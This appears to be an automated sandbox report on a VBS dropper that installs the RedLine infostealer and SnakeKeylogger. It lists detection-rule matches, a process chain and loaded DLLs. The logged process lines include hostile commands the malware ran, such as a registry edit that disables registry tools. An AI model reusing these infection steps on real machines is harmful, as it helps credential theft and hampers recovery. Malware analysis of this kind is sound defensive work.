            Source: 11.1.liuuazhU.pif.43d038.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.2.liuuazhU.pif.43d038.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.1.liuuazhU.pif.43d038.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 1.2.x.exe.215607b8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.43d038.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000011.00000001.2046847022.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000B.00000002.3089643523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000011.00000002.3089641728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000006.00000001.1853843841.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: liuuazhU.pif PID: 1856, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: liuuazhU.pif PID: 5640, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: liuuazhU.pif PID: 5956, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: classification engine; Classification label: mal100.troj.spyw.evad.winVBS@28/11@3/3
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 1_2_027D7FD4 GetDiskFreeSpaceA, 1_2_027D7FD4
            Source: C:\Users\Public\Libraries\liuuazhU.pif; Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 6_2_004019F0
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 1_2_027E6DC8 CoCreateInstance, 1_2_027E6DC8
            Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\Public\Libraries\YKA
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1220:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1144:120:WilError_03
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1928:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs"
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Command line argument: 08A 6_2_00413780
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Command line argument: 08A 11_2_00413780
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Command line argument: 08A 11_1_00413780
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Command line argument: 08A 17_2_00413780
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D575000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D593000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D585000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AE2A000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AE38000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AE1A000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C888000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C896000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C878000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: INQUIRY LIST 292.vbs | ReversingLabs: Detection: 31%
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\UhzauuilF.cmd" "
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pif
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
            Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Users\Public\Libraries\Uhzauuil.PIF "C:\Users\Public\Libraries\Uhzauuil.PIF"
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Process created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pif
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
            Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Users\Public\Libraries\Uhzauuil.PIF "C:\Users\Public\Libraries\Uhzauuil.PIF"
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Process created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pif
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: url.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ieframe.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: netapi32.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wkscli.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: smartscreenps.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ieproxy.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mssip32.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winhttpcom.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: webio.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ??????????.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ??.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: am.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: sppc.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ???.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ??l.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ?.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ????.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ???e???????????.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: tquery.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptdll.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: spp.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: vssapi.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: vsstrace.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: endpointdlp.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: advapi.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: sppwmi.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: slc.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: sppcext.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winscard.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: devobj.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: apphelp.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: kernel.appcore.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: uxtheme.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: mscoree.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: wldp.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: amsi.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: userenv.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: profapi.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: version.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: msasn1.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: gpapi.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: cryptsp.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: rsaenh.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: cryptbase.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: windows.storage.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: rasapi32.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: rasman.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: rtutils.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: mswsock.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: winhttp.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: iphlpapi.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: dhcpcsvc.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: dnsapi.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: winnsi.dll
